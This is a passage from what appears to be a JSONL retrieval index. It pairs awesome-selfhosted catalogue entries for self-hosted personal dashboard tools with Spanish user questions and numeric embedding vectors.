-0.05725, 0.00101, -0.04189, 0.05099, 0.02354, -0.01801, 0.0486, -0.06346, -0.06493, 0.07683, -0.02112, -0.08486, -0.00367, 0.07012, 0.05474, -0.03931, 0.01958, -0.20351, 0.03226, -0.0538, -0.01805, 0.03137, -0.01544, -0.06464, 0.08991, -0.0509, 0.04302, 0.10436, -0.03848, 0.07206, -0.01244, 0.10192, 0.10455, -0.0617, -0.01066, 0.03048, -0.09131, -0.03642, 0.01649, -0.03397, 0.00513, 0.0212, -0.01642, 0.12093, -0.06977, -0.00794, 0.01865, 0.01833, 0.00784, -0.07794, 0.01959, 0.08936, -0.06249, 0.08122, 0.05995, -0.10376, 0.10297, 0.0475, 0.05116, 0.06114, 0.05368, -0.10024, -0.06984, -0.00705, -0.05163, 0.09894, 0.05019, -0.07202, -0.08573, 0.01202, -0.00865, -0.0411, -0.02791, 0.01307, -0.06067, 0.00681, -0.05105, -0.01673, -0.0397, -0.08758, -0.10204, -0.00066, -0.02797, 0.01492, 0.0968, 0.00139, 0.06598, 0.1414, -0.05061, 0.07992, 0.03724, -0.09755, -0.03646, 0.04056, -0.02894, -0.05992, 0.02858, -0.02736, 0.02366, -0.02569, 0.11451, 0.06875, -0.0129, 0.06808, 0.02414, -0.01339, 0.05976, -0.03072, 0.01084, 0.01493, -0.0178, 0.0059, -0.01619, 0.04827, -0.05428, -0.0664, 0.01696, -0.05048, 0.01927, 0.01155, -0.09304, -0.00504, -0.03749, -0.07589, 0.04223, -0.04276, -0.01791, 0.05229, 0.11605, 0.12598, -0.00293, 0.12026, 0.07046, -0.13133, 0.04503, 0.01052, 0.0221, -0.05148, 0.04991, -0.08112, -0.14958, -0.00147, 0.1055, 0.08125, 0.00333, -0.02779, -0.08705, -0.0069, -0.02385, 0.08568, -0.05545, 0.0636, -0.03786, -0.02878, 0.02871, 0.00523, -0.01018, -0.0552, -0.00835, -0.03159, -0.04187, -0.03078, 0.02864, -0.0189, 0.00167, 0.13988, 0.00047, 0.01933, 0.03826, 0.13407, 0.00321, 0.01995, 0.06409, 0.02964, 0.01994, -0.05832, 0.06152, 0.07453, 0.02093, 0.01486, 0.06449, -0.01399, -0.02961, 0.07794, -0.00184, -0.00412, 0.01308, -0.03006, 0.00052, -0.0129, -0.0205, -0.04964, -0.01532, -0.03151, -0.0183, -0.03803, -0.02579, -0.03942, -0.02905, -0.03796, -0.07142, 0.06251, 0.0283, -0.04272, -0.00082, 0.0162, -0.02604, 0.00434, -0.01848, 0.01872, -0.06444, 0.01332, 0.07536, -0.00585, 0.03213, 0.04072]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Dashy β€” Feature-rich homepage for your homelab, with easy YAML configuration [MIT, Nodejs/Docker]. Glance β€” Highly customizable dashboard that puts all your feeds in one place [AGPL-3.0, Docker/Go]. gobookmarks β€” Landing page to display bookmarks stored in GitHub, GitLab or local Git [AGPL-3.0, Go/Docker]. Heimdall β€” Elegant solution to organise all your web applications [MIT, PHP]. Homarr β€” Sleek, modern dashboard with many integrations and web-based config [MIT, Docker/Nodejs]. Homepage by gethomepage β€” Highly customizable homepage (or startpage / application dashboard) with Docker and service API integrations [GPL-3.0, Docker/Nodejs]. Homepage by tomershvueli β€” Simple, standalone, self-hosted PHP page that is your window to your server and the web [MIT, PHP]. Homer β€” Dead simple static homepage to expose your server services, with an easy yaml configuration and connectivity check [Apache-2.0, Docker/K8S/Nodejs]. Hubleys β€” Personal dashboards to organize links for multiple users via a central yaml config [MIT, Docker].", "indexar": "con quΓ© puedo crear una pΓ‘gina de control personal con muchas opciones de configuraciΓ³n?", "v": [-0.04216, 0.2263, -0.08615, -0.10579, -0.00425, -0.12605, -0.01518, 0.02417, -0.11573, -0.1227, -0.05746, -0.11679, 0.05313, -0.13524, -0.0208, -0.04125, 0.10946, -0.06916, 0.07518, 0.0737, -0.01933, -0.08954, -0.01383, -0.01187, -0.0559, -0.06853, 0.09895, -0.0459, -0.17554, -0.00491, -0.04714, 0.03187, -0.03841, 0.06686, -0.01113, 0.11093, 0.02785, 0.13152, 0.06368, 0.08459, -0.02377, -0.06352, 0.00894, 0.20917, 0.13043, 0.11393, -0.00922, 0.02274, 0.00376, 0.00888, 0.05816, 0.01986, -0.07843, 0.03003, 0.04061, -0.00259, 0.09615, -0.14412, 0.05278, -0.03054, -0.04783, 0.03878, -0.00262, 0.11997, -0.06375, 0.03267, -0.06952, -0.07054, 0.03658, 0.08427, -0.02562, -0.11461, -0.11509, -0.05306, 0.1277, 0.06084, 0.01605, 0.05615, 0.06831, -0.0367, -0.05245, -0.00224, -0.10364, -0.0379, -0.10074, -0.02252, -0.13851, -0.0121, 0.01544, -0.11812, 0.06766, -0.08598, 0.02057, -0.01966, -0.07104, -0.02503, -0.00812, 0.08723, -0.07606, 0.00728, 0.0141, 0.02632, -0.05208, 0.1644, 0.04606, -0.01421, 0.09736, -0.07362, 0.00227, -0.0634, 0.03185, 0.06213, -0.02039, -0.04862, -0.01592, -0.04501, -0.05615, 0.07073, -0.00835, -0.03015, -0.07323, 0.002, 0.02608, -0.07034, 0.06888, 0.0781, 0.05758, 0.05993, -0.04043, 0.06891, -0.02968, -0.06987, 0.01169, -0.03033, 0.06377, 0.0121, -0.06892, -0.03895, -0.00987, -0.06738, 0.01693, 0.03031, 0.03009, -0.10481, 0.05372, -0.14782, -0.09995, 0.01792, -0.03339, 0.05402, -0.02003, -0.0189, 0.07563, -0.00517, -0.03863, 0.08414, -0.03456, -0.01556, 0.03958, 0.02792, -0.02773, 0.072, -0.05925, 0.07471, 0.05886, -0.03062, -0.05984, -0.00067, -0.01037, 0.0549, -0.07944, 0.04738, 0.03157, -0.07629, 0.0309, -0.08317, -0.05938, -0.02794, 0.0345, -0.00407, 0.01716, -0.04592, -0.05798, 0.00998, 0.02645, -0.07602, 0.01381, 0.01981, -0.00275, 0.00274, -0.02843, 0.0641, -0.0142, -0.00488, 0.04048, -0.02909, 0.04566, -0.02092, -0.08334, -0.00601, 0.01472, -0.02923, 0.0305, -0.01607, 0.01845, 0.01098, -0.0502, 0.01234, 0.01772, -0.02998, 0.07868, -0.05857, 0.07026, -0.02932, -0.05327, 0.0599, 0.06095, -0.04214, 0.07603, -0.0677, 0.08853, 0.00712, 0.01804, 0.00471, 0.04123, 0.00641, 0.01314, -0.00085, 0.01242, 0.05362, -0.01002, -0.02441, -0.00365, -0.02847, 0.05148, 0.01582, 0.07433, 0.02553, -0.01244, 0.00632, 0.01342, 0.07925, 0.00074, -0.04826, 0.00282, -0.06321, -0.11857, -0.00723, -0.05472, -0.04929, -0.00715, 0.0075, 0.02309, -0.01065, -0.03379, -0.03487]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Dashy β€” Feature-rich homepage for your homelab, with easy YAML configuration [MIT, Nodejs/Docker]. Glance β€” Highly customizable dashboard that puts all your feeds in one place [AGPL-3.0, Docker/Go]. gobookmarks β€” Landing page to display bookmarks stored in GitHub, GitLab or local Git [AGPL-3.0, Go/Docker]. Heimdall β€” Elegant solution to organise all your web applications [MIT, PHP]. Homarr β€” Sleek, modern dashboard with many integrations and web-based config [MIT, Docker/Nodejs]. Homepage by gethomepage β€” Highly customizable homepage (or startpage / application dashboard) with Docker and service API integrations [GPL-3.0, Docker/Nodejs]. Homepage by tomershvueli β€” Simple, standalone, self-hosted PHP page that is your window to your server and the web [MIT, PHP]. Homer β€” Dead simple static homepage to expose your server services, with an easy yaml configuration and connectivity check [Apache-2.0, Docker/K8S/Nodejs]. Hubleys β€” Personal dashboards to organize links for multiple users via a central yaml config [MIT, Docker].", "indexar": "cuΓ‘l es una alternativa libre y fΓ‘cil de usar para organizar todos mis enlaces en una sola interfaz?", "v": [0.08286, 0.18803, -0.18453, -0.01604, 0.03592, -0.10635, -0.0663, -0.08348, -0.17111, -0.07038, -0.12252, -0.18879, -0.05753, 0.01396, 0.12864, -0.02261, 0.10499, -0.12039, -0.02655, -0.02625, -0.09904, 0.01979, -0.1258, -0.01787, -0.08704, -0.1452, 0.10798, -0.04045, -0.10243, -0.05624, -0.07469, -0.0197, 0.10889, -0.02547, -0.00809, -0.00569, 0.13867, 0.09045, 0.03742, -0.10503, -0.05803, -0.00207, -0.14172, 0.12268, -0.00269, 0.01982, -0.05192, 0.00815, -0.05038, 0.07218, -0.04003, -0.06261, -0.07224, 0.01694, -0.00695, -0.13492, 0.10633, -0.09773, -0.02405, 0.00167, -0.07821, 0.06677, 0.04133, 0.0902, 0.07357, -0.02572, -0.14317, 0.01639, -0.023, 0.07166, -0.00725, 0.00882, -0.01093, -0.01503, 0.00025, 0.15279, -0.05865, -0.00035, 0.05463, 0.12298, 0.06984, -0.06755, 0.01145, 0.0489, -0.04766, -0.07006, 0.12459, -0.04499, -0.05506, -0.051, 0.06987, 0.04179, 0.00497, -0.03759, -0.02563, -0.10555, -0.00343, 0.11066, 0.08288, 0.02258, 0.07666, -0.05694, -0.03796, 0.09161, -0.04612, -0.06785, 0.01716, 0.0084, -0.05664, -0.04221, 0.01762, 0.00928, 0.0025, -0.03655, -0.08617, -0.01303, 0.0034, -0.00362, -0.01786, -0.09268, -0.02436, -0.04753, -0.00224, -0.0059, -0.01643, 0.03521, 0.0748, 0.09751, -0.00079, 0.05018, 0.00027, -0.03413, -0.11268, -0.09619, -0.06125, -0.00963, -0.02939, -0.06259, 0.06289, -0.03716, 0.00978, 0.05109, -0.02413, -0.09843, 0.01682, -0.0077, 0.03981, -0.05645, -0.06032, -0.03321, 0.01872, -0.03225, -0.00662, 0.03735, -0.01547, -0.00897, -0.03071, -0.05232, -0.02126, 0.05153, -0.03127, -0.01568, -0.05879, 0.02359, 0.07118, -0.07561, -0.02827, -0.02307, -0.04882, -0.00027, 0.02748, 0.12683, 0.03205, -0.06899, 0.03342, -0.05339, -0.01224, -0.0756, 0.01648, -0.01038, 0.03103, 0.01407, -0.08378, 0.03353, -0.03499, -0.06132, 0.05969, 0.04448, -0.00167, 0.01522, 0.0009, 0.06062, -0.03605, -0.00657, 0.03465, 0.0017, -0.02966, -0.10186, -0.01356, -0.03008, -0.03383, -0.08275, 0.01143, -0.05047, 0.03698, 0.00313, -0.07339, 0.03328, 0.01233, 0.10658, 0.06174, -0.03795, 0.10653, 0.00415, -0.08502, -0.0017, 0.02233, -0.01829, 0.03483, -0.02179, 0.02058, 0.07152, -0.00216, -0.02728, 0.02495, 0.00212, 0.00919, 0.0155, -0.02724, 0.05199, -0.02357, 0.00322, 0.01591, -0.0259, -0.00989, -0.01311, 0.00887, -0.02129, -0.02122, -0.02664, 0.04751, 0.05881, -0.02281, -0.01152, -0.06113, -0.03101, -0.08511, 0.0536, -0.03435, -0.09116, -0.02553, 0.02719, 0.10247, -0.00367, -0.01702, 0.02706]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: LinkStack β€” Link all your social media platforms easily accessible on one page, customizable through an intuitive, easy to use user/admin interface (alternative to Linktree and Manylink) [AGPL-3.0, PHP/Docker]. LittleLink β€” Simplistic approach for links in bio with 100+ branded buttons (alternative to Linktree) [MIT, Javascript]. Mafl β€” Minimalistic flexible homepage [MIT, Docker/Nodejs]. Nimbus β€” Modern drag-and-drop homelab dashboard with visual editor and simple configuration [AGPL-3.0, Docker]. Personal Management System β€” Organize the essentials of everyday life, everything from a simple to-do list, and notes up to payments, and schedules [MIT, Docker]. portkey β€” Simple web portal that serves as a startup page, displaying a compilation of links and URLs, while also allowing the addition of custom pages, all managed through a single configuration file [AGPL-3.0, Go/Docker]. ryot β€” Track various facets of your life - media, fitness, etc [GPL-3.0, Docker].", "indexar": "con quΓ© puedo montar un tablero de control personal en casa?", "v": [-0.00199, 0.07892, -0.1432, -0.04915, -0.14426, 0.0299, 0.05963, 0.09403, -0.08618, -0.06048, -0.081, -0.03944, 0.1249, -0.06889, 0.05118, 0.08283, 0.07364, -0.02163, 0.09104, 0.02019, -0.02677, -0.037, -0.03922, -0.00248, -0.00761, -0.01975, 0.08237, -0.06724, -0.13975, 0.12958, -0.0015, 0.03395, 0.01655, 0.03973, -0.01724, -0.01397, 0.02068, 0.00902, -0.00863, -0.00823, 0.02292, -0.04386, -0.03461, 0.06751, 0.07357, 0.01893, 0.09319, -0.07549, -0.04048, 0.12974, -0.05482, -0.09195, 0.06857, 0.00529, -0.02996, -0.06576, 0.06598, -0.00266, 0.19203, -0.00042, -0.07961, 0.01429, 0.09212, 0.16063, -0.0648, 0.05656, -0.07659, 0.0258, -0.01056, 0.00427, -0.06064, -0.11927, -0.00717, -0.0114, -0.04992, 0.01311, 0.02393, -0.02472, 0.08302, -0.04538, -0.05003, -0.10119, -0.17727, 0.12072, 0.02354, -0.00557, -0.01692, -0.11272, 0.03035, 0.01063, 0.04998, 0.02267, 0.10799, -0.02185, -0.00271, -0.04451, 0.03213, 0.15859, -0.08828, 0.00114, 0.02093, 0.05934, -0.01841, 0.22705, 0.05317, 0.0256, 0.04085, -0.01639, -0.04394, -0.09451, -0.06215, 0.15031, -0.09817, 0.05093, 0.02472, -0.04427, -0.05559, 0.08389, -0.03256, -0.04809, -0.08724, 0.0944, 0.13256, -0.00355, -0.02829, -0.06448, 0.16786, 0.09884, -0.09479, 0.05804, -0.02436, -0.03166, -0.02766, -0.00107, 0.06908, 0.05016, -0.09481, -0.07772, -0.00793, -0.05434, 0.02831, 0.05276, -0.00194, -0.12217, 0.03127, -0.04804, -0.08458, 0.09837, -0.07555, 0.10525, -0.02145, 0.10739, 0.06276, -0.05153, 0.06406, -0.04567, -0.00139, 0.05152, 0.0373, 0.00669, -0.00861, 0.04587, -0.04518, 0.03019, -0.00622, 0.08692, 0.02666, 0.06964, -0.03125, 0.01748, -0.12562, 0.0011, -0.02242, 0.00849, 0.01031, -0.04736, 0.00646, 0.00278, -0.10708, -0.03353, -0.00967, 0.03307, -0.00567, -0.01356, -0.0039, 0.07849, 0.02911, 0.02115, 0.01583, -0.00951, -0.08506, -0.00382, 0.01487, 0.01501, -0.02113, -0.0065, 0.00556, 0.03553, 0.06772, 0.00736, 0.0231, -0.06903, 0.06013, 0.02529, 0.04494, -0.02072, 0.00267, 0.039, 0.05973, 0.0049, 0.04789, 0.01294, 0.06339, 0.01632, -0.00535, 0.07565, -0.03237, -0.01741, 0.04362, 0.0476, 0.08359, -0.00797, 0.02835, -0.05623, -0.00417, 0.03026, -0.02902, -0.04954, 0.00187, 0.08028, 0.02321, -0.07985, 0.04549, 0.02378, 0.03457, -0.01141, 0.00392, -0.03097, 0.05075, 0.00761, -0.01985, 0.08119, 0.02716, -0.01421, 0.00313, -0.06922, -0.04778, 0.02529, 0.00138, -0.05203, -0.00524, -0.05395, -0.02567, -0.00685, -0.04086, 0.00882]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: LinkStack β€” Link all your social media platforms easily accessible on one page, customizable through an intuitive, easy to use user/admin interface (alternative to Linktree and Manylink) [AGPL-3.0, PHP/Docker]. LittleLink β€” Simplistic approach for links in bio with 100+ branded buttons (alternative to Linktree) [MIT, Javascript]. Mafl β€” Minimalistic flexible homepage [MIT, Docker/Nodejs]. Nimbus β€” Modern drag-and-drop homelab dashboard with visual editor and simple configuration [AGPL-3.0, Docker]. Personal Management System β€” Organize the essentials of everyday life, everything from a simple to-do list, and notes up to payments, and schedules [MIT, Docker]. portkey β€” Simple web portal that serves as a startup page, displaying a compilation of links and URLs, while also allowing the addition of custom pages, all managed through a single configuration file [AGPL-3.0, Go/Docker]. ryot β€” Track various facets of your life - media, fitness, etc [GPL-3.0, Docker].", "indexar": "que programa sirve para crear una pΓ‘gina con enlaces a mis redes sociales tipo Linktree pero mΓ‘s fΓ‘cil de usar?", "v": [-0.04452, 0.12367, -0.167, -0.17035, 0.03484, -0.12654, -0.13593, -0.06236, 0.01007, -0.14769, -0.08622, -0.14666, -0.07437, -0.14969, 0.10248, -0.02211, 0.05094, -0.08823, 0.14184, -0.06156, -0.00426, 0.00926, -0.13297, -0.11896, -0.09417, -0.09958, 0.11518, -0.08574, -0.14356, 0.07045, -0.08774, 0.00834, 0.0261, -0.03559, -0.00737, -0.02262, 0.10264, 0.11754, 0.02231, -0.01442, 0.00016, -0.0391, -0.15107, 0.04675, -0.07788, 0.08748, -0.02878, -0.07837, -0.05789, 0.0517, -0.03922, -0.00011, -0.20149, 0.00066, -0.10925, -0.11013, 0.07824, -0.13258, -0.12163, 0.03425, -0.04481, 0.05272, -0.02447, -0.01852, -0.02944, -0.10172, 0.02901, 0.04662, -0.03986, 0.00701, -0.01464, 0.02605, 0.00763, -0.0327, 0.04484, 0.11866, 0.0025, 0.00774, 0.00619, 0.04272, -0.04192, -0.02808, -0.01061, -0.02291, -0.10043, 0.00839, 0.07711, -0.01068, -0.0384, -0.11939, 0.03567, 0.06804, -0.02641, -0.04223, -0.02726, -0.05344, 0.00551, -0.00122, 0.08545, -0.02078, -0.00491, -0.0505, 0.01242, 0.08066, -0.03804, -0.02183, 0.02412, -0.05662, 0.02809, -0.01024, 0.1097, -0.02101, -0.04798, -0.06225, -0.08735, 0.06236, -0.06499, 0.01195, 0.03662, -0.0725, -0.04611, -0.02527, -0.04727, 0.00308, -0.00786, 0.09331, 0.01154, 0.10077, -0.01121, 0.04157, -0.06651, 0.00497, -0.06427, -0.0731, -0.00455, -0.05152, 0.00973, -0.05797, -0.01901, -0.1073, 0.02355, 0.06984, -0.04683, -0.11302, -0.00528, -0.00241, 0.04949, -0.11131, -0.07441, 0.02579, 0.02302, 0.03793, -0.03617, -0.00916, -0.06331, -0.00923, -0.04453, -0.03702, 0.00306, 0.05541, -0.05802, -0.00594, 0.00929, -0.03697, 0.05238, 0.01711, -0.04571, 0.02878, 0.08299, 0.06267, -0.04452, 0.13689, -0.00127, -0.07227, 0.04284, -0.0381, -0.01781, -0.05271, 0.02863, 0.02324, -0.09692, -0.04025, 0.00759, 0.05967, -0.01881, -0.09807, 0.01875, 0.03309, -0.02556, 0.0194, -0.03712, -0.00747, -0.0102, 0.08916, 0.05326, -0.05571, -0.01069, -0.04106, 0.07999, -0.06709, -0.03703, -0.05566, -0.00124, 0.00893, 0.00211, 0.03431, -0.01051, -0.05058, 0.00394, 0.10137, 0.01849, -0.0841, 0.03572, 0.00756, -0.04443, -0.02802, 0.08811, -0.02532, 0.04175, 0.02424, 0.03234, 0.02939, 0.00894, 0.05487, 0.0297, 0.0334, 0.00361, -0.02942, -0.04602, 0.03132, -0.00209, -0.06074, -0.04852, -0.05434, 0.00105, -0.04738, 0.02612, 0.01169, -0.04969, -0.03944, -0.00829, 0.02578, -0.00487, 0.0176, -0.04032, -0.01465, -0.09043, 0.02167, 0.00618, -0.09399, -0.01506, 0.00199, 0.05359, -0.02842, 0.02606, 0.0236]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: LinkStack β€” Link all your social media platforms easily accessible on one page, customizable through an intuitive, easy to use user/admin interface (alternative to Linktree and Manylink) [AGPL-3.0, PHP/Docker]. LittleLink β€” Simplistic approach for links in bio with 100+ branded buttons (alternative to Linktree) [MIT, Javascript]. Mafl β€” Minimalistic flexible homepage [MIT, Docker/Nodejs]. Nimbus β€” Modern drag-and-drop homelab dashboard with visual editor and simple configuration [AGPL-3.0, Docker]. Personal Management System β€” Organize the essentials of everyday life, everything from a simple to-do list, and notes up to payments, and schedules [MIT, Docker]. portkey β€” Simple web portal that serves as a startup page, displaying a compilation of links and URLs, while also allowing the addition of custom pages, all managed through a single configuration file [AGPL-3.0, Go/Docker]. ryot β€” Track various facets of your life - media, fitness, etc [GPL-3.0, Docker].", "indexar": "cual es una alternativa libre para gestionar mis tareas diarias y notas desde mi servidor privado?", "v": [-0.08653, 0.16495, -0.07295, -0.14741, -0.07374, -0.06039, -0.0298, -0.03285, -0.12372, 0.03258, -0.03724, -0.16671, 0.08585, -0.0543, 0.07359, -0.03234, 0.20998, -0.06938, 0.10547, 0.08048, -0.08157, 0.01621, 0.01642, 0.00531, -0.104, -0.08073, 0.04862, -0.09229, -0.09151, 0.11304, 0.02642, -0.03468, 0.11115, -0.13163, 0.02696, 0.08852, 0.05292, 0.13902, -0.01337, -0.11107, 0.06215, 0.02592, -0.11049, 0.14766, 0.12831, -0.08302, -0.00327, -0.04074, -0.01225, 0.00101, -0.08123, -0.0333, -0.02613, 0.05147, 0.01307, 0.00091, 0.09606, -0.12269, 0.00568, -0.02852, -0.18754, 0.09921, 0.00241, -0.06403, 0.10066, -0.01837, 0.02213, -0.0342, -0.11728, 0.10197, 0.00911, 0.03018, 0.03113, -0.07432, -0.0057, 0.02279, -0.02241, 0.01236, 0.01485, 0.04566, -0.0005, -0.00879, -0.05703, 0.14321, -0.05637, -0.13536, 0.04825, -0.04612, 0.01259, 0.11814, 0.08165, -0.01009, -0.12031, 0.03467, -0.04292, 0.04329, 0.08171, 0.02721, 0.00524, 0.01112, 0.09128, 0.06918, -0.03255, 0.00651, -0.04499, 0.0571, -0.02444, 0.01171, 0.02306, -0.01674, -0.04656, -0.01979, -0.01434, 0.02716, -0.00442, -0.00546, -0.02817, 0.01345, -0.01032, 0.01431, -0.03209, -0.07097, 0.00397, 0.001, 0.07418, -0.11345, 0.07231, 0.01369, 0.05647, 0.05566, -0.04069, 0.01446, -0.03656, -0.05544, -0.00615, 0.02357, 0.05373, -0.04623, -0.04941, -0.10269, -0.02521, 0.07844, 0.00772, -0.01069, 0.13344, -0.00905, 0.03593, -0.10722, -0.02145, 0.01735, -0.01434, -0.06707, -0.0191, 0.06647, -0.06475, 0.02135, -0.02758, -0.02106, -0.09326, 0.11112, 0.06707, -0.02182, -0.0083, 0.08311, -0.01867, -0.08494, 0.01792, 0.08193, -0.01643, 0.08247, -0.04828, 0.05289, 0.02219, -0.10231, 0.07487, -0.09418, -0.00755, -0.0923, 0.06237, 0.04621, 0.02264, 0.0665, -0.03051, 0.02187, -0.03679, -0.0422, -0.01133, 0.03064, 0.00043, 0.00484, -0.00078, 0.02335, -0.05339, -0.05971, 0.03534, -0.01731, -0.01659, -0.07603, -0.05528, -0.01831, -0.00619, -0.06011, -0.05834, -0.00233, -0.05677, -0.00452, -0.01567, 0.03184, 0.06642, 0.04568, 0.00882, 0.05726, 0.06664, -0.01625, -0.06032, 0.00597, 0.04534, -0.0526, 0.00736, -0.0425, 0.01774, 0.01416, 0.06265, -0.04975, -0.01488, 0.04059, 0.02495, 0.03487, 0.02321, 0.02932, -0.04775, 0.07383, -0.03092, 0.00942, 0.04941, -0.02947, 0.02079, -0.01056, -0.01453, -0.04214, 0.05571, 0.11054, -0.01612, -0.06077, -0.05888, -9e-05, -0.04025, 0.01218, -0.08659, -0.0345, -0.03108, -0.01323, 0.05253, 0.00248, 0.04997, -0.0341]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Starbase 80 β€” A simple homepage with an iPad-style application grid, for mobile and desktop. One JSON configuration file [MIT, Docker]. Your Spotify β€” Allows you to record your Spotify listening activity and have statistics about them served through a Web application [⚠, MIT, Nodejs/Docker].", "indexar": "que herramienta sirve para crear un dashboard personal tipo iPad con una configuraciΓ³n en JSON?", "v": [-0.05593, 0.02276, -0.21432, -0.2263, 0.00193, -0.13959, -0.07875, -0.00939, 0.00767, -0.02295, -0.05865, -0.14914, -0.02819, -0.1287, -0.04044, -0.00229, 0.12091, -0.08829, -0.04874, 0.00264, -0.00169, 0.11517, -0.06717, -0.04244, -0.05697, 0.05467, 0.0376, -0.01094, -0.30685, 0.07995, 0.00374, -0.03351, 0.00807, 0.0237, -0.13332, -0.10197, 0.03984, 0.15142, -0.16778, 0.04452, 0.06191, 0.07607, -0.01862, 0.10919, 0.06271, 0.17652, 0.03314, 0.08391, -0.08327, 0.17137, -0.04022, -0.03978, -0.09624, 0.0449, -0.0094, -0.12445, 0.18442, -0.14947, 0.03796, -0.02451, -0.1234, 0.03377, -0.0432, -0.03009, -0.04773, -0.03569, 0.00162, -0.09213, -0.00785, 0.03977, 0.07733, -0.11848, 0.01485, -0.02983, 0.08159, -0.02333, 0.05255, 0.07448, 0.07175, -0.00497, 0.03751, 0.02266, -0.12802, 0.0437, -0.05289, -0.00015, 0.05143, -0.00616, -0.01843, 0.01797, 0.00015, -0.02132, 0.04907, 0.00475, -0.07001, 0.02491, 0.10057, -0.02617, -0.00984, -0.05753, 0.09616, -0.07401, -0.03001, 0.09771, -0.00824, 0.02353, 0.04281, -0.07373, -0.02007, -0.0391, 0.06049, 0.05601, -0.01821, 0.00469, -0.03914, -0.01318, -0.0568, -0.06738, -0.02104, -0.01403, 0.0457, 0.01456, -0.02395, -0.04696, 0.00391, 0.05194, -0.03185, 0.05937, -0.02294, 0.0422, -0.00128, -0.05475, -0.0412, 0.06105, -0.02436, 0.04491, -0.07349, -0.09078, -0.00895, -0.05062, 0.06289, 0.06507, 0.00965, -0.13333, 0.05467, -0.07907, 0.02556, -0.01488, 0.00293, 0.09935, 0.00605, -0.00229, 0.04229, 0.0054, -0.04455, 0.00482, 0.01971, 0.01017, -0.03993, 0.00552, -0.08658, -0.0397, 0.03678, 0.09056, 0.0485, -0.0204, -0.00387, 0.04649, 0.09496, 0.02735, -0.01367, 0.02834, 0.05148, -0.01183, -0.00074, -0.05531, -0.02432, 0.04932, 0.03586, -0.00305, -0.0013, -0.03819, -0.04791, -0.01505, -0.00405, -0.10236, -0.02286, -0.01614, 0.00324, 0.00981, -0.04697, 0.07281, 0.01607, -0.03112, 0.03322, 0.00894, -0.00146, -0.0352, -0.00546, -0.02164, -0.00984, 0.00659, -0.04408, -0.03238, 0.01126, 0.02156, -0.0557, 0.00307, -0.00345, 0.02279, 0.04056, 0.00697, 0.01629, -0.03978, 0.01226, 0.00815, 0.02552, -0.00667, 0.04765, -0.04156, 0.08579, -0.00969, 0.00309, -0.00828, -0.00916, 0.05682, 0.00396, -0.00492, -0.021, -0.01532, 0.03911, 0.00158, -0.00188, -0.0002, 0.00738, -0.01574, 0.05114, -0.02355, -0.01438, -0.02935, -0.01606, 0.03886, 0.05218, -0.04533, -0.03196, -0.08077, -0.00337, -0.00347, 0.00145, -0.08033, -0.03706, 0.02381, 0.05411, -0.01783, 0.01121, -0.01759]} +{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Starbase 80 β€” A simple homepage with an iPad-style application grid, for mobile and desktop. One JSON configuration file [MIT, Docker]. Your Spotify β€” Allows you to record your Spotify listening activity and have statistics about them served through a Web application [⚠, MIT, Nodejs/Docker].", "indexar": "con que puedo grabar mi actividad de Spotify y generar estadΓ­sticas en una aplicaciΓ³n web?", "v": [0.12547, 0.10343, -0.13568, -0.16765, 0.05295, -0.08894, -0.05672, -0.09993, 0.00039, -0.03583, -0.0309, -0.06036, -0.03528, -0.04835, 0.07768, 0.0123, -0.01153, -0.11629, -0.04839, 0.11167, -0.03542, 0.05541, 0.04303, -0.04632, 0.01046, 0.00079, 0.10572, -0.00073, -0.16407, 0.05802, -0.01137, 0.03449, -0.02571, -0.12533, -0.12591, -0.07697, -0.01893, -0.02411, -0.00508, -0.04599, 0.06289, -0.04968, -0.08301, -0.02838, -0.03786, 0.06751, -0.02029, -0.04571, -0.03751, 0.04916, 0.06773, 0.02474, -0.03069, 0.02801, -0.05736, 0.02796, 0.0765, -0.25555, 0.03211, -0.06013, 0.00522, 0.02534, -0.09306, 0.016, 0.04726, 0.00302, 0.08649, 0.11805, -0.09212, 0.11653, -0.00264, 0.11438, -0.08617, 0.0457, 0.169, 0.04472, -0.07008, -0.15025, -0.02927, -0.03428, -0.00705, -0.11511, -0.01753, 0.05098, -0.12674, 0.00898, 0.0632, -0.03797, 0.00865, -0.00949, 0.00626, 0.05104, -0.02959, 0.05847, -0.00352, -0.04636, 0.13066, -0.00782, 0.06435, -0.00956, 0.05461, -0.0225, -0.07812, 0.02783, 0.01906, 0.08414, 0.00675, -0.06011, -0.00179, 0.06018, -0.02557, -0.00836, -0.10645, -0.05464, -0.0417, 0.02278, -0.045, -0.11415, 0.03052, -0.07183, -0.01559, 0.01582, -0.02101, -0.12488, -0.09001, 0.00011, -0.07913, 0.09957, 0.01411, 0.05561, 0.01805, 0.0067, 